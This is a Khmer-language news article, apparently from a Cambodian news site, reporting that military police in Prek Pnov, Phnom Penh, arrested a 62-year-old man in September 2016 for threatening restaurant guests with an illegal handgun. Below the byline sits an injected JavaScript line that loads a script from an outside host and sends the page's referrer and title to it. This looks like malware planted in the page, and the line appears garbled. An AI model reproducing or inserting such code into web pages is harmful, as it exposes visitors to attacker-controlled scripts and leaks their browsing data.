ព្រឹតិ្តការណ៍ថ្មីៗ

កងរាជអាវុធខណ្ឌព្រែកព្នៅ ឃាត់ខ្លួនជនសង្ស័យម្នាក់ ពីបទប្រើប្រាស់អាវុធខុសច្បាប់

3 ឆ្នាំ មុន 2 tnn_admin

ភ្នំពេញៈ ជនសង្ស័យម្នាក់ ត្រូវបានកម្លាំងកងរាជអាវុធហត្ថខណ្ឌព្រែកព្នៅ ធ្វើការឃាត់ខ្លួន ដោយជនសង្ស័យប្រើប្រាស់អាវុធខុសច្បាប់ កាលពីវេលាម៉ោង ៩និង៣០នាទីយប់ ថ្ងៃទី១៩ ខែកញ្ញា ឆ្នាំ២០១៦ នៅត្រង់ចំណុចក្នុងភោជនីយដ្ឋាន បឹងសុបិន ដែលស្ថិតនៅតាមបណ្តោយផ្លូវទំនប់កប់ស្រូវ ភូមិផ្សារលិច សង្កាត់ព្រែកព្នៅ ខណ្ឌព្រែកព្នៅ រាជធានីភ្នំពេញ។

ជនសង្ស័យដែលកម្លាំងកងរាជអាវុធហត្ថឃាត់ខ្លួនមានឈ្មោះ រៀម ជឿន ហៅតាអិដ្ឋ ភេទប្រុស អាយុ ៦២ឆ្នាំ មុខរបរ មិនពិតប្រាក ស្នាក់នៅភូមិលូ សង្កាត់ស្វាយប៉ាក ខណ្ឌឫស្សីកែវ ព្រមទាំងបានដកហូតអាវុធខ្លី មួយដើម ម៉ាក រ៉ូឡូ ពណ៌ស គ្រាប់គ្មាន និងសម្លៀកបំពាក់យោធា។

 

ប្រភពព័ត៌មានពីមន្ត្រីកងរាជអាវុធហត្ថបានប្រាប់ឲ្យដឹងថា នៅថ្ងៃទី១៩ ខែកញ្ញា ឆ្នាំ២០១៦ វេលាម៉ោង ៩និង០០នាទីយប់ មានប្រជាពលរដ្ឋម្នាក់ បានចូលទៅផឹកស៊ីក្នុងភោជនីយដ្ឋាន បឹងសុបិន បានទូរស័ព្ទទៅរាយការណ៍ប្រាប់សមត្ថកិច្ចថា មានបុរសម្នាក់បានដកកាំភ្លើងខ្លី មួយដើម ម៉ាក រ៉ូឡូ យកមកគំរាមភ្ញៀវក្នុងហាង ហើយបានស្រែកឡូឡា ដោយប្រមាតដល់ថ្នាក់ដឹកនាំប្រទេសកំពូលៗរបស់យើង។ ក្រោយមកពីបានទទួលដំណឹងរួចមក កម្លាំងជំនាញស៊ីវិល នឹងក្រុមល្បាតបានចុះទៅដល់កន្លែងកើតហេតុ ហើយព្រមទាំងបានធ្វើការឃាត់ខ្លួន និងដកហូតកាំភ្លើង បញ្ជូនទៅកាន់ការិយាល័យបទល្មើសព្រហ្មទណ្ឌកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ។

 

បច្ចុប្បន្នជនសង្ស័យខាងលើ រួមនឹងវត្ថុតាង ត្រូវបានកម្លាំងកងរាជអាវុធក្រុង កំពុងធ្វើការសាកសួរ និងកសាងសំណុំរឿង បញ្ជូនទៅកាន់តុលាការ ចាត់ការតាមនីតិវិធីច្បាប់៕ ដោយ៖ ស៊ុនតិច

untitleds.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ